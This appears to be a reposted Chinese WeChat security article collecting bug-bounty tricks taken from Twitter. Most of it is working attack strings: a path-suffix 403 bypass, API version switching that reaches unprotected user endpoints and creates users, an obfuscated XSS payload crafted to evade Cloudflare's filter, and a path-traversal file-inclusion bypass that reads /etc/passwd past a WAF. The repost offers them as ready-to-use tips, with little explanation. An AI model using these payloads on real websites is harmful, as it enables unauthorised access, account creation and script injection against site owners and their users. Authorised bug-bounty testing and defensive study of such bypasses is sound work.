403 Bypass
site[.]com/env => 403 Forbidden
site[.]com/env/HTTPS2 => Bypassed
Bug Bounty Dorks
API hacking
1. GET /v2/users or /v2/users.json -> 403
2. GET /v3/users -> 403
3. GET /v3/users.json -> 200
4. GET /v4/users -> 200
5. POST /v4/users -> 200 [Users created]
bugbounty poc集合
https://github.com/zeroc00I/AllVideoPocsFromHackerOne/tree/main/weakness
命令注入备忘录
Cloudfalre XSS Bypass
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//
https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312
本地文件包含 WAF (Cloudflare) bypass
../../etc/passwd = 403 Forbidden
../../etc/random/../passwd = 200 OK
由HACK学习编辑整理,如需转载请注明来源HACK学习
如有侵权,请联系删除
推荐阅读
原文始发于微信公众号(橘猫学安全):干货 | Twitter渗透技巧搬运工
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论